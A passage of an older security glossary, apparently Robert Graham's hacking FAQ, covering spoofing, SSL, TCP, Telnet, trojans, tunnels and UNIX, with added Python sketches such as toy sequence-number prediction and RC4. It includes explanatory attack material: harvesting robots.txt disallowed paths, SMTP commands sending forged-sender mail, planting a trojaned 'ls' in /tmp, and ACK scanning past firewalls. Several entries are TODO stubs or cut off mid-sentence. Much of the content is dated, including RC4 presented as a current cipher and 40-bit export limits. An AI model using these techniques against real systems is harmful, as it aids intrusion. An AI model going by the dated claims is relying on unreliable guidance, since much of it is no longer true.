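Example (sketch): Both sides of this can be shown with Python's standard urllib.robotparser module. The sample file contents, the spider name, and the helper names are invented for illustration; the first helper behaves like a well-mannered spider, the second does what a curious hacker does.

```python
from urllib.robotparser import RobotFileParser

# Hypothetical robots.txt contents for illustration.
SAMPLE_ROBOTS = """\
User-agent: *
Disallow: /admin/
Disallow: /old-site/backup/
"""

def polite_spider_may_fetch(robots_text, url, agent="ExampleSpider"):
    """Ask whether a spider that honors robots.txt would fetch this URL."""
    parser = RobotFileParser()
    parser.parse(robots_text.splitlines())
    return parser.can_fetch(agent, url)

def hidden_paths(robots_text):
    """List every path the operator asked spiders to stay away from."""
    paths = []
    for line in robots_text.splitlines():
        field, _, value = line.partition(":")
        if field.strip().lower() == "disallow" and value.strip():
            paths.append(value.strip())
    return paths
```

The file is only a hint: nothing stops a client from requesting the listed paths, so it should never be the sole protection for sensitive pages.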

Example: Spammers use spiders to sift through web pages looking for e-mail addresses. For example, if you have a link that looks like <A HREF="mailto:spexamp@reckoning.robertgraham.com">me</A> then the spam spider will find the address and funnel spam to you. A partial defense against this is to URL-encode your e-mail address, which hides it from most spam spiders, but works in most browsers. See the page at http://www.robertgraham.com/tools/mailtoencoder.html for an example.
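Example (sketch): URL-encoding an address is mechanical. The Python below replaces every character with its %XX form; the function name and the address used are placeholders, and this is one possible way to do it rather than the method used by the page mentioned above.

```python
from urllib.parse import unquote

def encode_mailto(address):
    """Percent-encode every character of an e-mail address for a mailto: link."""
    return "mailto:" + "".join("%{:02X}".format(b) for b in address.encode("ascii"))

# A browser decodes the link back to the plain address when it is clicked.
encoded = encode_mailto("me@example.com")
decoded = unquote(encoded)   # "mailto:me@example.com"
```

A spam spider that simply searches pages for text shaped like name@host will not match the encoded form, though one that decodes URLs first will.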

Contrast: A spider pulls information inward; a worm pushes itself outward to other systems. A spider is a type of 'bot, rather than infectious malware like viruses, trojans, or worms.

spoof [3]

The word "spoof" generally means the act of forging your identity. More specifically, it refers to forging the sender's IP address (IP spoofing).

Analogy: When you send a letter via normal post (snail mail), you write the recipient's name and address on the envelope. You typically write the sender's name and address as well, so that if there is an error forwarding your letter (e.g. a stamp falls off), the post office knows who sent the letter and can return it. However, you can easily spoof the return address. For example, someone I know absolutely had to send a letter, but had no stamps. So he simply wrote the actual recipient's name and address in the return address section of the envelope and dropped it into the mail box. The letter was "returned to sender", which of course meant it arrived at the intended recipient.

Misunderstanding: Most people are interested in spoofing because they think it will allow them to hack a machine in a completely anonymous manner. It doesn't work this way. For example, Mitnick used IP spoofing in order to attack Shimomura's computers, but was caught anyway because spoofing does not truly hide the attacker. The problem is that all responses go back to the spoofed sender address, so if you've spoofed the sender, you'll never see the responses. Therefore, spoofing is useless for any normal activity. On the other hand, spoofing can still be useful in situations where seeing the response is not necessary. In the Mitnick instance, two machines trusted each other. Therefore, Mitnick was able to emulate an entire connection between the two machines by "predicting" what all the responses would be. He used this connection to open up something on the victim machine that he could then connect to normally. It was the precursor scanning and the post-spoof connection that Shimomura used to catch Mitnick.

Example: A particularly nasty form of spoofing is TCP sequence number prediction. Theoretically, you cannot spoof any protocol based upon TCP connections. This is because both sides of a TCP connection choose their own Initial Sequence Number (ISN). In theory, this is a completely random number that cannot be guessed. In practice, it can sometimes be easily guessed. Mitnick used this technique when hacking Shimomura. As of the end of 1999, operating systems such as Linux, WinNT, and Win2k have implemented truly random ISNs in order to defeat this type of attack.
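Example (sketch): The difference between a guessable and an unguessable ISN can be shown with a toy model in Python. The fixed step of 64000 is an illustrative assumption, not a claim about any particular operating system, and the function names are made up.

```python
import secrets

def predictable_isns(start, step, count):
    """Toy model of a weak stack: each new ISN is the previous one plus a fixed step."""
    return [(start + i * step) % 2**32 for i in range(count)]

def guess_next(observed):
    """Attacker's guess: assume the gap between the last two observed ISNs repeats."""
    step = (observed[-1] - observed[-2]) % 2**32
    return (observed[-1] + step) % 2**32

def random_isn():
    """What a hardened stack aims for: a 32-bit value with no usable pattern."""
    return secrets.randbits(32)

# The attacker opens a few legitimate connections, records the ISNs,
# then predicts the ISN the victim will choose for the spoofed connection.
samples = predictable_isns(start=1000, step=64000, count=4)
prediction = guess_next(samples[:3])   # matches samples[3] in this toy model
```

With random_isn() in place of the fixed step, the same guess would be right only about one time in four billion.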

Example: In terms of volume of traffic, the most common use of spoofing today is smurf and fraggle attacks. These attacks bounce spoofed packets off amplifiers in order to overload the victim's connection. This is done by sending a single packet to a broadcast address with the victim as the source address. All the machines within the broadcast domain then respond back to the victim, overloading the victim's Internet connection. Since smurfing accounts for more than half the traffic on some backbones, ISPs are starting to take spoofing seriously and have started implementing measures within their routers that verify valid source addresses before passing the packets. As a consequence, spoofing will become increasingly difficult as time goes on.

Key point: Most of the discussion of spoofing centers around clients masquerading as somebody else. On the other hand, the reverse problem is equally worrisome: hackers can often spoof servers. For example, I post on my website that there is a serious security fix needed to protect yourself while on the web, and point you to http://www.micrsoft.com and hope that you never notice that the URL is misspelled. You would then go to that site (which would really be my server) and download the patch, which would really be a Trojan Horse that I designed in order to break into your computer. This is why server-side certificates are important: they allow someone to validate that the server isn't bogus.
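Example (sketch): The source-address check that ISPs apply at the customer edge amounts to a membership test. The Python below uses the standard ipaddress module; the prefixes are documentation ranges chosen for illustration and the function name is hypothetical.

```python
import ipaddress

def source_is_valid(src_ip, customer_prefixes):
    """Return True if a packet's source address belongs to the customer's own prefixes."""
    addr = ipaddress.ip_address(src_ip)
    return any(addr in ipaddress.ip_network(prefix) for prefix in customer_prefixes)

# Hypothetical customer link that has been assigned 192.0.2.0/24.
CUSTOMER = ["192.0.2.0/24"]
```

A router doing this drops a packet arriving from the customer link with a source such as 198.51.100.7, which is exactly what a smurf packet forged with the victim's address would look like.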

Key point: As the analogy with postal mail shows, many things can be forged, not just the sender's IP address. Most spammers forge their sender's e-mail address in order to avoid all the hate mail they will receive in response. Forging your own sender e-mail address is as simple as reconfiguring your e-mail client -- anybody can do it. (However, there are more secrets to this, which mean you can still be caught by any determined person).

spread-spectrum [3]

A radio transmission technique that spreads the signal over a wide radio spectrum. It can be used as a security technique whereby a key determines how the signal is spread, making it unreadable to anybody who doesn't know the key. However, in practice, spread-spectrum is generally used for its superior noise immunity qualities and rarely for its security features. People prefer to encrypt data normally before transmission.

ssh [3]

Essentially, ssh is a secure replacement of Telnet (as well as rlogin, rsh, and rcp). It fixes the problem where clear-text passwords can be sniffed off the wire. While the most common uses of ssh are to securely login and copy files, it can form the basis of an entire secure-communications infrastructure, including VPN.

Key point: Disable Telnet and the BSD 'r' utilities right now and replace them with SSH. Servers and clients are available not only for UNIX, but for virtually all platforms (including Windows and Macintosh). A client is even available for Java.

SSL [1]

Provides a "secure" (i.e. encrypted) connection between the web-browser and the web-server so that the data cannot be sniffed. SSL is used primarily for HTTP, but can also be used for other protocols such as FTP or Telnet.

Key point: Web servers have a certificate signed by a trusted certificate authority (CA). This certificate allows the client and the server to generate random keys for the session and to exchange them securely (to defend against man-in-the-middle attacks). The generated random key is used to encrypt the rest of the contents of the connection, usually using RC4. U.S. export controls attempt to limit products used abroad to only 40 bits of key length, which can easily be broken.

Key point: In SSL, the server first authenticates itself with the client (a process that makes it more likely that e-commerce vendors are reputable). Therefore, if you want to set up your own SSL-based web server, you need to get a signed certificate from a CA. Furthermore, if you are outside the U.S., you will find it difficult to find one for 128-bits, though the Chaos Computer Club in Germany manages nicely.
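Example (sketch): From the client's side, "the server authenticates itself" means the client refuses to continue unless the certificate chains to a CA it trusts and matches the host name. The Python below uses the standard ssl module, which implements TLS, the successor named in the History note for this entry. The function names are invented; fetch_peer_subject needs network access and is shown only to indicate where the check happens.

```python
import socket
import ssl

def make_verifying_context():
    """Client-side context that checks the server certificate against trusted CAs."""
    return ssl.create_default_context()

def fetch_peer_subject(host, port=443):
    """Connect, let the handshake verify the certificate, and return its subject."""
    context = make_verifying_context()
    with socket.create_connection((host, port), timeout=10) as raw:
        # wrap_socket raises an ssl.SSLError subclass if verification fails.
        with context.wrap_socket(raw, server_hostname=host) as tls:
            return tls.getpeercert().get("subject")
```

A server presenting a certificate for a different name, or one signed by an unknown CA, causes the handshake to fail before any application data is exchanged.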

Key point: The chief reason SSL isn't used more widely is that it creates a huge performance hit on servers due to the need to encrypt/decrypt everything. This is changing as new devices are becoming available that offload this process. CrypoSwitch

History: SSL was originally developed by Netscape to promote e-commerce. It is also known under the IETF standard name of TLS (Transport Layer Security).

steganography (stegano, TRANSEC) [4]

In cryptography, steganography refers to not only obfuscating (encrypting) data, but hiding the fact that it even exists. In communications, stegano refers to hiding that any attempt has been made to communicate in the first place.

History: In ancient times, a messenger would be shaved, then the message would be tattooed onto the skull. The hair would be allowed to grow back in, then the messenger was sent on his way. The recipient would then shave the messenger again in order to retrieve the message.

SunOS [1]

The UNIX-based operating system for Sun's computers.

Contrast: In the 1980s, SunOS was based upon BSD. In the 1990s, Sun replaced SunOS with Solaris, a System V based operating system.

Key point: The word "SunOS" refers to SunOS version 4. The word "Solaris" refers to SunOS version 5.

Key point: The last major version of SunOS was 4.1.3, and it continues to be popular (in much the same way that DOS and Win 3.1 continue to be installed on new machines). As a result, there are thousands of SunOS machines still out there that haven't been patched and which are susceptible to old exploits.

swap [4]

An important aspect of all operating systems is a feature called "virtual memory". This allows the OS to take unused pieces of memory and write them to disk, then free up the block of memory just written so that another active application can use it. Whenever somebody needs that block again, the operating system will automatically restore it from the disk. Of course, it will then have to free up another block to do so by writing that block to the disk.

This process is generally called "swapping" or "paging". The word "swap" reflects the fact that inactive blocks of memory are being switched with active blocks from the disk. The word "paging" reflects the fact that a common name for a block of memory is "page". The name of the file on the disk that an OS uses for swapping is called the "swapfile" or "pagefile".

Key point: A lot of security depends upon the fact that memory is secure: the OS protects applications from reading other applications' memory, and when the computer is turned off, the memory is erased. Therefore, applications can safely store passwords in clear-text in memory. Swapping defeats this, because the memory pages that store the passwords may have been swapped to the disk. Someone with physical access to the machine can turn it off, steal the disk, and run the pagefile through analysis programs in order to possibly retrieve passwords.

symmetric [4]

In encryption, the word symmetric refers to cases where the same key both encrypts and decrypts. This has been historically the "normal" encryption, but new public-key cryptography is changing things.

Analogy: In your house, the same keys are used to lock and unlock your door.

Examples: Some symmetric encryption ciphers are:

DES: The forerunner to most of today's popular symmetric ciphers.
RC2, RC4, and RC5: Popular ciphers by RSA used in today's browsers for secure connections to websites.
IDEA: A cipher made popular by the fact that it was used in PGP.
Blowfish: A well-regarded cipher with free source code, no license required, unpatented, and royalty-free. As such, it is an extremely popular symmetric encryption algorithm.
Twofish: A new cipher with many of the same restrictions as Blowfish (i.e. none). It is even more efficient, and destined to become very popular.
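Example (sketch): RC4, one of the ciphers listed above, is short enough to show how a single key both encrypts and decrypts. The Python below is a plain rendering of the publicly documented algorithm, offered as an illustration of symmetry rather than as code to protect real data.

```python
def rc4(key: bytes, data: bytes) -> bytes:
    """Encrypt or decrypt data with RC4; the same call does both."""
    # Key scheduling: shuffle the 256-entry state table using the key.
    state = list(range(256))
    j = 0
    for i in range(256):
        j = (j + state[i] + key[i % len(key)]) % 256
        state[i], state[j] = state[j], state[i]

    # Keystream generation: XOR each data byte with the next keystream byte.
    i = j = 0
    out = bytearray()
    for byte in data:
        i = (i + 1) % 256
        j = (j + state[i]) % 256
        state[i], state[j] = state[j], state[i]
        out.append(byte ^ state[(state[i] + state[j]) % 256])
    return bytes(out)

ciphertext = rc4(b"Key", b"Plaintext")
recovered = rc4(b"Key", ciphertext)   # same key, same function, original text back
```

Anyone who holds the key can run the same function in either direction, which is why distributing that key safely is the hard part of symmetric encryption.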

syslog [4]

On UNIX, syslog is the standard logging facility. Programs call the syslog() function, and their messages end up somewhere in the /var/log directory. The syslog facility can also be configured to forward alerts from one UNIX machine to another (using un-authenticated UDP datagrams to port 514).
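Example (sketch): A forwarded syslog alert is just a short text datagram with a priority number in angle brackets. The Python below formats one in the classic BSD style and shows how it would be sent; the function names are made up, and the message text is a placeholder.

```python
import socket

def syslog_datagram(facility, severity, text):
    """Format a classic syslog message: <priority>text, priority = facility*8 + severity."""
    priority = facility * 8 + severity
    return "<{}>{}".format(priority, text).encode("ascii", "replace")

def forward(message, host, port=514):
    """Send one datagram; there is no authentication and no acknowledgement."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.sendto(message, (host, port))

# Facility 4 (security/authorization), severity 5 (notice).
packet = syslog_datagram(4, 5, "login failed for root")
```

Since the receiver accepts whatever arrives on the port, anybody who can reach it can inject forged log entries, which is worth remembering when reading forwarded logs after a break-in.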

Key point: When analyzing a machine that was broken into, you may find interesting information in the syslog logs. In particular, buffer-overflow attempts have distinctive messages, such as messages claiming an unknown command where the command is a string of binary characters.

- T -

TCP [1]

Transmission Control Protocol. The chief transport protocol for TCP/IP.

Key point: TCP is "connection oriented". This means the three-way handshake must be completed before any data can be sent across the connection. This makes IP address spoofing impossible without sequence number prediction.

Key point: TCP creates a virtual "byte stream" for applications. Therefore, applications that send/receive data must create their own boundaries, such as length encoding the data, or send text data a line at a time. However, in practice, applications do indeed send data aligned on packet boundaries. Most network-based intrusion detection systems depend upon these boundaries in order to work correctly. Therefore, they can easily be evaded by custom written scripts that misalign the data. The applications don't see any difference, but the NIDS see something completely different go across the wire that no longer matches their signatures.
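Example (sketch): Length encoding is one way for an application to create its own boundaries. The Python below uses a 2-byte length prefix, which is an arbitrary choice for this illustration, and reassembles messages correctly no matter how the bytes are split across packets.

```python
import struct

def frame(payload):
    """Prefix a message with its length as a 2-byte big-endian integer."""
    return struct.pack("!H", len(payload)) + payload

class LengthPrefixedReader:
    """Reassemble framed messages from chunks of any size."""

    def __init__(self):
        self._buffer = b""

    def feed(self, chunk):
        """Add bytes as they arrive; return any messages that are now complete."""
        self._buffer += chunk
        messages = []
        while len(self._buffer) >= 2:
            (length,) = struct.unpack("!H", self._buffer[:2])
            if len(self._buffer) < 2 + length:
                break   # the rest of this message has not arrived yet
            messages.append(self._buffer[2:2 + length])
            self._buffer = self._buffer[2 + length:]
        return messages
```

A receiver written this way sees the same messages whether the sender delivers them in one packet or one byte at a time, which is the property that misaligned-data evasion relies on.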

Contrast: There are two transport protocols: TCP and UDP. Whereas TCP is connection-oriented, UDP is connectionless, meaning UDP-based applications are easily spoofed.

TCP Format:

    0                   1                   2                   3   
    0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |          Source Port          |       Destination Port        |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                        Sequence Number                        |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                    Acknowledgment Number                      |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |  Data |           |U|A|P|R|S|F|                               |
   | Offset| Reserved  |R|C|S|S|Y|I|            Window             |
   |       |           |G|K|H|T|N|N|                               |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |           Checksum            |         Urgent Pointer        |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                    Options                    |    Padding    |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                             data                              |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Sequence Number: Identifies the position within the byte stream of the first byte of data carried in this packet; in a SYN packet it carries the Initial Sequence Number. Key point: Guessing this value is what TCP sequence number prediction is about.
Reserved: Not used. Note that this "field" is actually two fields: the low-order bits of the data offset byte and the high-order bits of the flags byte. Key point: The two undefined flags in this field are handled differently by different systems, which allows them to be fingerprinted.
URG: The urgent flag is used to send what is known as out-of-band data. Key point: TCP/IP stacks often don't implement this right, and virtually no application uses it either. In fact, the WinNuke DoS attack against Windows was due to the fact that Windows would crash on URG data.
ACK: When set, the Acknowledgment Number field is valid. Key point: This bit is set in every packet but the first one, because every TCP packet acknowledges the last data it received. Key point: In order to block incoming connections, firewalls typically only pay attention to TCP packets with the ACK bit == 0. In other words, by blocking the first packet of a TCP connection, you prevent the connection from being established in the first place. Key point: Hackers can usually send TCP packets through a firewall by setting the ACK bit. Even though hackers cannot connect to a service, they can still do things like port scanning using this technique.
PSH: Normally, TCP tries to coalesce multiple packets into a single packet in order to improve throughput performance (processing one big chunk is more efficient than smaller chunks), but at the cost of latency (after receiving the first chunk, it must wait a little bit to see if a second chunk arrives). This bit tells the stack to push the data through immediately without waiting.
RST: Informs the other side that an error has occurred. This will either drop the connection or set it back to a known state. Key point: Different TCP/IP stacks send resets in response to different conditions, which can be used to fingerprint the stack.
SYN: Begins a connection. The most important consideration is synchronizing the sequence numbers on both sides.
FIN: Closes a connection. Key point: If you send a FIN packet to an open port, it should not respond. Some incorrectly written stacks respond anyway, allowing you to fingerprint a system. Key point: IDS systems monitoring network traffic will sometimes kill TCP sessions by spoofing a FIN packet. Thus, when the IDS detects an intruder connected to a server, it will make the server think the intruder has hung up, and the server will likewise hang up.
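Example (sketch): The fixed 20-byte part of the header shown above can be unpacked directly with Python's struct module. The function names are invented for this illustration; is_connection_attempt mirrors the simple firewall test of "SYN set, ACK clear" described under ACK.

```python
import struct

# Flag bits in the low six bits of the flags byte, as in the diagram.
FLAG_BITS = [("FIN", 0x01), ("SYN", 0x02), ("RST", 0x04),
             ("PSH", 0x08), ("ACK", 0x10), ("URG", 0x20)]

def parse_tcp_header(segment):
    """Decode the fixed 20-byte TCP header at the start of a segment."""
    (src, dst, seq, ack, offset_byte, flag_byte,
     window, checksum, urgent) = struct.unpack("!HHIIBBHHH", segment[:20])
    return {
        "src_port": src, "dst_port": dst, "seq": seq, "ack": ack,
        "header_len": (offset_byte >> 4) * 4,   # data offset counts 32-bit words
        "flags": {name for name, bit in FLAG_BITS if flag_byte & bit},
        "window": window, "checksum": checksum, "urgent": urgent,
    }

def is_connection_attempt(header):
    """First packet of a connection: SYN set, ACK clear."""
    return "SYN" in header["flags"] and "ACK" not in header["flags"]
```

A filter that blocks only packets for which is_connection_attempt is true stops inbound connections, but lets through a lone packet with ACK set, which is the gap that ACK scanning uses.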

TCP sequence number prediction [4]

When trying to spoof a TCP connection, the intruder is faced with the difficulty that he will never see the responses. This is a problem because the victim sends back information to the spoofed address that is needed to carry on the conversation, namely the sequence number being used by the victim. Even though the intruder cannot see these returned seq TODO:

TCP/IP [1]

A term that refers collectively to the protocols used on the Internet. The term evolved from the fact that these were the two most important protocols for engineers. If you talk about how to get data across the network from machine to machine, then you talk about IP packets. If you are interested in the abstract communication between applications, then you talk about TCP connections. If you talk about generic transport of data encompassing both concepts (machine and application), then you naturally talk about both TCP and IP, or simply TCP/IP.

TCP Wrappers [3]

A program like a personal firewall for UNIX systems that blocks unwanted access to applications.

Telnet [1]

A remote shell that provides terminal-like access.

Key point: Telnet can open up a raw TCP connection to any port in order to allow a hacker to interact directly with text-based protocols.

Example: Telnet to your local SMTP server using a command that looks like telnet smtp.example.com 25. The first parameter should be your own mail server, whereas the second parameter indicates which port to connect to (other than the default port 23). Now type in the text as you see it below:

	HELO foo.example.com
	MAIL FROM: nobody@example.com
	RCPT TO: hacker-test@robertgraham.com
	DATA
	this data will appear in the contents of the e-mail message
	.

This will send an e-mail message with the indicated From: and To: addresses and the indicated content.

Key point: When abusing Telnet in this fashion, you cannot see the echoed characters, nor can you edit what you type by using the backspace key. Remember that the service on the other end thinks you are a program, so you shouldn't need to see the characters you type, and you should type these characters correctly the first time.

Key point: Some intrusion detection systems, like Network ICE, detect character-by-character activity instead of the expected line-by-line activity.

Contrast: The netcat tool provides the same ability to open a raw TCP connection, but sends a line at a time, echoes the characters back so you can see what you type, and allows you to edit the line before sending it. It also allows you to receive incoming connections, which might be useful when hacking FTP.

TEMPEST [3]

TEMPEST describes the ability to monitor electromagnetic emissions from computers in order to reconstruct the data. This allows remote monitoring of network cables, remote viewing of monitors, or simply scanning data from a system bus. The word TEMPEST applies to the government's effort to protect its own systems (rather than espionage efforts attacking other systems). The word TEMPEST isn't really an acronym, though some claim it stands for "Transient Electromagnetic Pulse Emanation Standard". The market for TEMPEST equipment is over $1-billion/year.

Key point: The term "van Eck monitoring" refers to the ability to remotely view a terminal/CRT from its radiation (see Phrack 44-11). Ross Anderson and Markus Kuhn have come up with an innovative technique of producing fonts that remove the high-frequency information, and thus severely reduce the ability to remotely view text on the screen.

Key point: Electromagnetic emissions can leak out of a Faraday cage through fibre optic cables. In other words, the problem is really tough, much more difficult than you would think.

Resources: See The Complete, Unofficial TEMPEST Information Page at http://www.eskimo.com/~joelm/tempest.html.

TFTP [3]

Trivial File Transfer Protocol. TFTP is a bare-bones protocol used by devices that boot from the network. It is based upon UDP, so it doesn't require a real TCP/IP stack.

Misunderstanding: Many people describe TFTP as simply a trivial version of FTP. This misses the point. The purpose of TFTP is not to reduce the complexity of file transfer, but to reduce the complexity of the underlying TCP/IP stack so that it can fit inside boot ROMs.

Key point: TFTP is almost always used with BOOTP. BOOTP first configures the device, then TFTP transfers the boot image.

Key point: Numerous systems come with unnecessary TFTP servers. Many TFTP servers have bugs, like the directory climbing problem or buffer overflows. As a consequence, many systems can be exploited with TFTP even though virtually nobody really uses it.

three-way-handshake (TWHS) [2]

In TCP, the connection process is known as the "three-way-handshake". Conceptually, it goes like this.


	Alice: Hello?

	Bob: Hello!

	Alice: How's it going?

What this means is that Alice first says "Hello" in order to indicate to Bob that she wants to talk to him. Bob responds with a "Hello" in order to indicate that he is willing to talk. Alice further sends some unimportant message in order to confirm to Bob that communication will indeed take place, and that the initial "Hello" wasn't just a passing greeting.

Key point: For such a simple purpose (initiating a conversation), the exact details of the TCP handshake are incredibly important. They are designed to overcome unreliable communication streams (analogy: a cell phone that keeps dropping out on you). Furthermore, the handshake provides some security against people spoofing connections to you. On the other hand, it isn't completely secure; sequence-number prediction may still allow spoofing while SYN floods can be used to DoS the machine.
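Example (sketch): In terms of actual TCP fields, the Alice/Bob exchange is three segments whose sequence and acknowledgment numbers depend on each other. The Python below lists them; the function name and the tuple layout are choices made for this illustration.

```python
def three_way_handshake(client_isn, server_isn):
    """Return the three handshake segments as (sender, flags, seq, ack) tuples."""
    next_client = (client_isn + 1) % 2**32   # a SYN consumes one sequence number
    next_server = (server_isn + 1) % 2**32
    return [
        ("Alice", "SYN",     client_isn,  None),         # Hello?
        ("Bob",   "SYN+ACK", server_isn,  next_client),  # Hello!
        ("Alice", "ACK",     next_client, next_server),  # How's it going?
    ]
```

The third segment must acknowledge Bob's sequence number plus one, so someone spoofing Alice's address, who never sees Bob's reply, has to guess that number in order to complete the connection.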

tiger teams [2]

Though originally a cyberpunk term, this is now generally used in the industry to refer to "white-hat" teams that attack and secure systems.

traceroute [2]

Traceroute is a command built into most systems that traces the path through the Internet between two points (on Windows, it is known as "tracert").

tripwire [3]

Tripwire is a tool that detects when files have been altered by regularly recalculating hashes of them and storing the hashes in a secure location. The product triggers when changes to the files have been detected.
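Example (sketch): The core idea, record hashes once and compare later, fits in a few lines of Python. This is not Tripwire's own code or file format; SHA-256 and the function names are choices made for the illustration.

```python
import hashlib

def file_hash(path):
    """Return the SHA-256 digest of a file, read in blocks."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for block in iter(lambda: handle.read(65536), b""):
            digest.update(block)
    return digest.hexdigest()

def snapshot(paths):
    """Record the current hash of every file; store the result somewhere safe."""
    return {path: file_hash(path) for path in paths}

def altered(baseline, paths):
    """Return the files whose current hash differs from the stored baseline."""
    current = snapshot(paths)
    return sorted(p for p in paths if current[p] != baseline.get(p))
```

The baseline is only as trustworthy as the place it is kept: an intruder who can rewrite the stored hashes can hide the changes.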

trojan [2]

TODO

Key point: The word can be used as a verb. To trojan a program is to add subversive functionality to an existing program. For example, a trojaned login program might be programmed to accept a certain password for any user's account that the hacker can use to log back into the system at any time. Rootkits often contain a suite of such trojaned programs.

Key point: Users can often break into a system by leaving behind trojaned command programs in directories (like their own directory or the /tmp directory). If you copy your own ls program to the /tmp directory, and somebody else does a cd /tmp then an ls, that user will run your program with their own privileges. This is especially dangerous against root, which is why the local directory should not be part of the search path for the root account.
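Example (sketch): Checking a search path for the dangerous entries is straightforward. The Python below assumes a UNIX-style, colon-separated path; the function name is hypothetical.

```python
def risky_path_entries(path_value, separator=":"):
    """Return search-path entries that mean "the current directory"."""
    risky = []
    for entry in path_value.split(separator):
        if entry in ("", "."):   # an empty entry is also treated as the current directory
            risky.append(entry)
    return risky

# Hypothetical root search path with a "." in the middle and a trailing colon.
found = risky_path_entries("/usr/bin:.:/bin:")
```

An empty result means commands such as ls will only be looked up in the listed system directories, not in whatever directory the user happens to be in.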

trust [3]

TODO

tunnel [3]

A way of establishing an outbound connection through a firewall in such a way that it is neither blocked nor monitored. This isn't a way of breaking through a firewall, but assuming you've compromised a machine on the other side of a firewall (through some other technique), this will allow you to communicate with that machine from the Internet. It is also used by people behind firewalls that use restrictive rulesets: users simply create a tunnel back to their home machine.

Example: People have written tunnels over ICMP, DNS, HTTP, e-mail messages, and TCP connections. Tunnels can either be of the "port redirector" style (which run on top of any TCP/IP stack) or of the network interface variety (below the TCP/IP stack, requiring a kernel mod).

two-person rule [5]

In paranoid cases, the two-person rule mandates that at least two persons must be present to carry out an action. An example would be a server that requires two people to enter their individual names and passwords. This is also known as a split-password.

Example: In the movies you often see that nuclear weapons have two separate keys in order to unlock them. The locks are placed in positions further apart than a single person can reach. The keys must be turned at the same time in order to unlock the system.

Example: Really important passwords (such as those protecting private keys) are often given in pieces -- different pieces to different people. This requires multiple people to be present in order to log on.
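Example (sketch): One simple way to hand out a secret in pieces is XOR splitting, where each share alone is random noise and both are needed to recover the secret. This is a technique swapped in for illustration, not a description of how any particular organization splits its passwords; the function names are made up.

```python
import secrets

def split_secret(secret: bytes):
    """Split a secret into two shares; neither share alone reveals anything."""
    share_a = secrets.token_bytes(len(secret))                 # pure randomness
    share_b = bytes(x ^ y for x, y in zip(secret, share_a))    # secret XOR randomness
    return share_a, share_b

def combine(share_a: bytes, share_b: bytes) -> bytes:
    """Recover the secret; requires both share holders to be present."""
    return bytes(x ^ y for x, y in zip(share_a, share_b))
```

Simply cutting a password in half is weaker than this, because each holder then only has to guess the other half.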

Example: Banks used to allow account holders to require two signatures on bank checks. This would cut down on fraud in businesses and charities. However, automatic

- U -

UDP (User Datagram Protocol) [1]

UDP is a transport protocol that provides "datagram" services on top of IP.

Contrast: There are two transport protocols: UDP and TCP. Both of these are responsible for hooking up the programs that are communicating with each other, whereas the underlying IP is simply responsible for getting the packets from machine to machine across the Internet. UDP is essentially just a light-weight version of TCP. Whereas TCP will automatically retransmit lost packets, UDP doesn't care. This is actually a benefit for audio/visual, but a severe disadvantage when transferring files.

UDP Format:

    0                   1                   2                   3   
    0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |          Source Port          |       Destination Port        |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |            Length             |           Checksum            |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

There is nothing too exciting about UDP. The source port identifies the application on the sending machine. The destination port identifies who is to receive the data. The length indicates how much data is in the packet; the checksum verifies that it has not been accidentally altered in transit (though it cannot protect against deliberate alteration).
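Example (sketch): The four fields of the UDP header are easy to build and decode with Python's struct module. The function names are invented here, and the checksum is left at zero, which in UDP over IPv4 means "no checksum was computed".

```python
import struct

def build_udp(src_port, dst_port, payload, checksum=0):
    """Build a UDP datagram: 8-byte header followed by the payload."""
    length = 8 + len(payload)   # the length field covers header plus data
    return struct.pack("!HHHH", src_port, dst_port, length, checksum) + payload

def parse_udp(datagram):
    """Decode the four header fields and slice out the payload."""
    src, dst, length, checksum = struct.unpack("!HHHH", datagram[:8])
    return {"src_port": src, "dst_port": dst, "length": length,
            "checksum": checksum, "payload": datagram[8:length]}
```

Nothing in these fields ties the datagram to an earlier exchange, which is why a forged source address is so much easier to get away with in UDP than in TCP.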

UNIX [1]

Key point: There really is no "UNIX", but just various implementations designed along the same guidelines. Different versions of UNIX are more or less related, and there is extensive cross-pollination of ideas, so that something good that appears in one will eventually migrate to others.

Contrast: There have been two main branches of UNIX: SVR4 (System V Release 4) and BSD (Berkeley Software Distribution). Many security issues depend upon which base the system was derived from.

Example: Sun Solaris, IBM AIX, SCO, SGI Irix, Apple A/UX, BSD, HP/UX.

Key point: UNIX is case-sensitive, whereas Windows and Macintosh are "case-insensitive" but "case-preserving". Windows has a compatibility mode that allows case-sensitivity, which can sometimes be exploited with other techniques in order to compromise the system.

Key point: The BSD branch has spawned many open-source variants, such as FreeBSD and OpenBSD. OpenBSD is considered one of the more secure versions of UNIX. Security experts spend the most time on OpenBSD in order to clean up bugs like buffer-overflows. However, in 1999, the dramatic rise of hacking and publication of bugs has led to a heightened awareness of these problems, which may lead to other systems becoming equally scoured for bugs.

How to: In order to harden UNIX, you generally do the following:

